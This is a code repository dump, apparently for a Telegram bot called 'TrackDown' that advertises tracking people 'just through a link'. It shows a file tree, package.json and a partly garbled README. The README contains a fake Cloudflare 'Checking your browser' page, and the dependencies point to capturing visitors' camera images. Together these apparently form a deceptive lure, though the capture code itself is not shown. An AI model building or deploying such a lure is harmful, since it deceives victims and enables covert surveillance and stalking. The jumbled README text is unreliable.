├── icon.png ├── replit.nix ├── package.json ├── README.md ├── .replit ├── views ├── webview.ejs └── cloudflare.ejs ├── index.js ├── LICENSE └── index.html /icon.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TechieGamer1/TechieCamHackBot/HEAD/icon.png -------------------------------------------------------------------------------- /replit.nix: -------------------------------------------------------------------------------- 1 | { pkgs }: { 2 | deps = [ 3 | pkgs.nodejs-16_x 4 | pkgs.nodePackages.typescript-language-server 5 | pkgs.yarn 6 | pkgs.replitPackages.jest 7 | ]; 8 | } -------------------------------------------------------------------------------- /package.json: -------------------------------------------------------------------------------- 1 | { 2 | "name": "TrackDown", 3 | "version": "1.0.0", 4 | "description": "Track Down People just through a link", 5 | "main": "index.js", 6 | "scripts": { 7 | "test": "echo \"Error: no test specified\" && exit 1", 8 | "start": "node index.js" 9 | }, 10 | "keywords": [], 11 | "author": { 12 | "name" : "Techie Gamer", 13 | "url" : "https://git.io/techiegamer1" 14 | }, 15 | "license": "MIT", 16 | "dependencies": { 17 | "base64-to-image": "^1.0.2", 18 | "body-parser": "^1.20.1", 19 | "ejs": "^3.1.8", 20 | "cors": "^2.8.5", 21 | "express": "^4.18.2", 22 | "node-fetch": "^2.2.6", 23 | "node-telegram-bot-api": "^0.60.0" 24 | } 25 | } 26 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | 2 |
![]()
|
37 |
38 |
41 |
61 |
42 |
55 |
60 |
43 |
44 |
45 |
46 |
47 | Checking your browser before accessing the website.48 | 51 |This process is automatic. Your browser will redirect to your requested content shortly. 52 | 53 |Redirecting… 54 | |
67 |
Hello, I'm SUMAN from India.
86 |I’m currently working on Cyber Ethical Hacking Penetration Testing & Bug Bounty.
87 | 88 | 89 |
94 |
95 |
96 |
97 |
98 |
99 |
100 |
101 |
102 |
103 |
104 |
105 |
106 |
107 |
108 |
109 |
110 |
111 |
112 |
113 |
114 |
115 |
116 |
117 |